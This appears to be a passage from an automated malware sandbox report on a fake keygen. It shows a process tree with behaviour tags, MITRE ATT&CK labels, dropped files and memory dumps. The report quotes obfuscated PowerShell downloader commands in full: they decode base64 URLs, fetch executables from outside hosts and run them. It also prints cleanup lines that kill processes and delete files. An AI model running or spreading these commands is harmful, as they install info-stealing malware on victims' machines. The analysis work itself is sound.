"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1900

C:\Users\Public\oze.exe
"C:\Users\Public\oze.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4908

C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
"C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:508

C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
"C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3856

C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
"{path}"
8⤵
- Executes dropped EXE
PID:2684

C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
"{path}"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 2852 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\761075476175412\\* & exit
9⤵
PID:1604

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 2852
10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4976

C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
"{path}"
7⤵
- Executes dropped EXE
PID:4528

C:\Users\Public\oze.exe
"{path}"
6⤵
- Executes dropped EXE
PID:4128

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BB95.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088

C:\Windows\SysWOW64\timeout.exe
timeout 2
3⤵
- Delays execution with timeout.exe
PID:944

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BB95.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692

C:\Users\Public\xnl.exe
"C:\Users\Public\xnl.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4920

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3464

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4452

C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2272

C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:4428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 4428 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\459678778903557\\* & exit
8⤵
PID:2320

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 4428
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3476

C:\Users\Public\xnl.exe
"C:\Users\Public\xnl.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2364

C:\Users\Admin\AppData\Local\Temp\kb9xDX33cv.exe
"C:\Users\Admin\AppData\Local\Temp\kb9xDX33cv.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Users\Admin\AppData\Local\Temp\kb9xDX33cv.exe
"C:\Users\Admin\AppData\Local\Temp\kb9xDX33cv.exe"
8⤵
- Executes dropped EXE
PID:1780

C:\Users\Admin\AppData\Local\Temp\kb9xDX33cv.exe
"C:\Users\Admin\AppData\Local\Temp\kb9xDX33cv.exe"
8⤵
- Executes dropped EXE
PID:1288

C:\Users\Admin\AppData\Local\Temp\BPtrSK8Zg4.exe
"C:\Users\Admin\AppData\Local\Temp\BPtrSK8Zg4.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies system certificate store
PID:4148

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
8⤵
PID:4588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\qufeitso.bat" "
9⤵
PID:972

C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
10⤵
- Modifies registry key
PID:3468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\qufeitso.bat" "
9⤵
PID:392

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
8⤵
PID:2388

C:\Users\Admin\AppData\Local\Temp\5ryO9HMQPs.exe
"C:\Users\Admin\AppData\Local\Temp\5ryO9HMQPs.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4644

C:\Users\Admin\AppData\Local\Temp\5ryO9HMQPs.exe
"C:\Users\Admin\AppData\Local\Temp\5ryO9HMQPs.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1620

\??\c:\windows\SysWOW64\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\asgjfa5q.inf
9⤵
PID:3932

C:\Users\Admin\AppData\Local\Temp\BJccGCNE9z.exe
"C:\Users\Admin\AppData\Local\Temp\BJccGCNE9z.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4940

C:\Users\Admin\AppData\Local\Temp\BJccGCNE9z.exe
"C:\Users\Admin\AppData\Local\Temp\BJccGCNE9z.exe"
8⤵
- Executes dropped EXE
- Windows security modification
PID:4252

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2864

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xnl.exe"
7⤵
PID:3924

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
8⤵
- Delays execution with timeout.exe
PID:4124

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BB95.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:3396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:1000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5ryO9HMQPs.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BJccGCNE9z.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kb9xDX33cv.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Temp\5ryO9HMQPs.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\5ryO9HMQPs.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\5ryO9HMQPs.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB95.tmp\Keygen.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB95.tmp\Keygen.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB95.tmp\b.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB95.tmp\b1.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB95.tmp\ba.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB95.tmp\ba1.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB95.tmp\m.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB95.tmp\m1.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\BB95.tmp\start.bat

Download Submit
C:\Users\Admin\AppData\Local\Temp\BJccGCNE9z.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\BJccGCNE9z.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\BJccGCNE9z.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\BPtrSK8Zg4.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\BPtrSK8Zg4.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\kb9xDX33cv.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\kb9xDX33cv.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\kb9xDX33cv.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\kb9xDX33cv.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe

Download Submit
C:\Users\Public\oze.exe

Download Submit
C:\Users\Public\oze.exe

Download Submit
C:\Users\Public\oze.exe

Download Submit
C:\Users\Public\qufeitso.bat

Download Submit
C:\Users\Public\xnl.exe

Download Submit
C:\Users\Public\xnl.exe

Download Submit
C:\Users\Public\xnl.exe

Download Submit
C:\Users\Public\yft.exe

Download Submit
C:\Users\Public\yft.exe

Download Submit
C:\Windows\temp\asgjfa5q.inf

Download Submit
\ProgramData\mozglue.dll

Download Submit
\ProgramData\nss3.dll

Download Submit
\ProgramData\sqlite3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll

Download Submit
memory/392-594-0x0000000000000000-mapping.dmp

Download
memory/508-363-0x00000000089B0000-0x00000000089F7000-memory.dmp

Filesize
284KB

Download
memory/508-181-0x0000000000000000-mapping.dmp

Download
memory/508-184-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/508-188-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

Filesize
4KB

Download
memory/636-82-0x0000000008950000-0x0000000008951000-memory.dmp

Filesize
4KB

Download
memory/636-40-0x0000000007A10000-0x0000000007A11000-memory.dmp

Filesize
4KB

Download
memory/636-45-0x0000000007910000-0x0000000007911000-memory.dmp

Filesize
4KB

Download
memory/636-25-0x0000000000000000-mapping.dmp

Download
memory/636-27-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/640-57-0x0000000008080000-0x0000000008081000-memory.dmp

Filesize
4KB

Download
memory/640-21-0x0000000000000000-mapping.dmp

Download
memory/640-28-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/640-93-0x0000000008AD0000-0x0000000008AD1000-memory.dmp

Filesize
4KB

Download
memory/944-15-0x0000000000000000-mapping.dmp

Download
memory/972-591-0x0000000000000000-mapping.dmp

Download
memory/1020-7-0x0000000000000000-mapping.dmp

Download
memory/1164-10-0x0000000000000000-mapping.dmp

Download
memory/1268-17-0x0000000000000000-mapping.dmp

Download
memory/1288-242-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/1288-239-0x000000000040C76E-mapping.dmp

Download
memory/1288-238-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1604-595-0x0000000000000000-mapping.dmp

Download
memory/1620-248-0x000000000040616E-mapping.dmp

Download
memory/1620-251-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/1620-247-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1732-146-0x0000000000000000-mapping.dmp

Download
memory/1900-100-0x0000000009C70000-0x0000000009C71000-memory.dmp

Filesize
4KB

Download
memory/1900-22-0x0000000000000000-mapping.dmp

Download
memory/1900-63-0x0000000008140000-0x0000000008141000-memory.dmp

Filesize
4KB

Download
memory/1900-33-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

Filesize
4KB

Download
memory/1900-31-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/1932-14-0x0000000000000000-mapping.dmp

Download
memory/2088-69-0x0000000007880000-0x0000000007881000-memory.dmp

Filesize
4KB

Download
memory/2088-24-0x0000000000000000-mapping.dmp

Download
memory/2088-29-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/2272-148-0x0000000000000000-mapping.dmp

Download
memory/2320-175-0x0000000000000000-mapping.dmp

Download
memory/2364-156-0x000000000043FA56-mapping.dmp

Download
memory/2364-159-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2364-153-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/2388-587-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/2388-588-0x000000000040DDD4-mapping.dmp

Download
memory/2388-589-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/2440-0-0x0000000000000000-mapping.dmp

Download
memory/2692-30-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/2692-51-0x0000000007EC0000-0x0000000007EC1000-memory.dmp

Filesize
4KB

Download
memory/2692-26-0x0000000000000000-mapping.dmp

Download
memory/2692-102-0x0000000009970000-0x0000000009971000-memory.dmp

Filesize
4KB

Download
memory/2692-75-0x0000000008730000-0x0000000008731000-memory.dmp

Filesize
4KB

Download
memory/2692-105-0x000000000A940000-0x000000000A941000-memory.dmp

Filesize
4KB

Download
memory/2852-541-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/2852-543-0x0000000000417A8B-mapping.dmp

Download
memory/2852-546-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/2864-282-0x00000000084B0000-0x00000000084B1000-memory.dmp

Filesize
4KB

Download
memory/2864-274-0x0000000000000000-mapping.dmp

Download
memory/2864-275-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/2864-286-0x0000000008920000-0x0000000008921000-memory.dmp

Filesize
4KB

Download
memory/2864-289-0x0000000009B90000-0x0000000009BC3000-memory.dmp

Filesize
204KB

Download
memory/2864-296-0x0000000009B70000-0x0000000009B71000-memory.dmp

Filesize
4KB

Download
memory/2864-298-0x0000000009CD0000-0x0000000009CD1000-memory.dmp

Filesize
4KB

Download
memory/2864-300-0x0000000009E40000-0x0000000009E41000-memory.dmp

Filesize
4KB

Download
memory/2864-302-0x00000000076F0000-0x00000000076F1000-memory.dmp

Filesize
4KB

Download
memory/2988-12-0x0000000000000000-mapping.dmp

Download
memory/3396-19-0x0000000000000000-mapping.dmp

Download
memory/3464-145-0x0000000000000000-mapping.dmp

Download
memory/3468-593-0x0000000000000000-mapping.dmp

Download
memory/3472-235-0x0000000005710000-0x0000000005749000-memory.dmp

Filesize
228KB

Download
memory/3472-236-0x0000000005860000-0x0000000005876000-memory.dmp

Filesize
88KB

Download
memory/3472-203-0x0000000000000000-mapping.dmp

Download
memory/3472-206-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/3472-207-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

Filesize
4KB

Download
memory/3476-177-0x0000000000000000-mapping.dmp

Download
memory/3608-9-0x0000000000000000-mapping.dmp

Download
memory/3728-2-0x0000000000000000-mapping.dmp

Download
memory/3728-3-0x0000000000000000-mapping.dmp

Download
memory/3856-385-0x0000000000D20000-0x0000000000D21000-memory.dmp

Filesize
4KB

Download
memory/3856-377-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/3856-373-0x0000000000000000-mapping.dmp

Download
memory/3856-534-0x0000000009230000-0x0000000009289000-memory.dmp

Filesize
356KB

Download
memory/3924-224-0x0000000000000000-mapping.dmp

Download
memory/3932-256-0x0000000000000000-mapping.dmp

Download
memory/3932-266-0x00000000045D0000-0x00000000045D1000-memory.dmp

Filesize
4KB

Download
memory/4024-87-0x0000000009D50000-0x0000000009D51000-memory.dmp

Filesize
4KB

Download
memory/4024-23-0x0000000000000000-mapping.dmp

Download
memory/4024-32-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/4124-233-0x0000000000000000-mapping.dmp

Download
memory/4128-189-0x0000000000400000-0x0000000000493000-memory.dmp

Filesize
588KB

Download
memory/4128-186-0x000000000043FA56-mapping.dmp

Download
memory/4128-185-0x0000000000400000-0x0000000000493000-memory.dmp

Filesize
588KB

Download
memory/4148-297-0x0000000002A70000-0x0000000002ACC000-memory.dmp

Filesize
368KB

Download
memory/4148-584-0x0000000050480000-0x000000005049A000-memory.dmp

Filesize
104KB

Download
memory/4148-305-0x0000000004D10000-0x0000000004D61000-memory.dmp

Filesize
324KB

Download
memory/4148-209-0x0000000000000000-mapping.dmp

Download
memory/4252-271-0x0000000070E90000-0x000000007157E000-memory.dmp

Filesize
6.9MB

Download
memory/4252-269-0x0000000000403BEE-mapping.dmp

Download
memory/4252-267-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/4428-174-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4428-170-0x0000000000417A8B-mapping.dmp

Download
memory/4428-169-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4440-164-0x000000000041A684-mapping.dmp

Download
memory/4440-163-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4440-167-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4452-168-0x000000000041A684-mapping.dmp

Download
memory/4528-380-0x000000000041A684-mapping.dmp

Download
memory/4528-383-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4528-379-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB
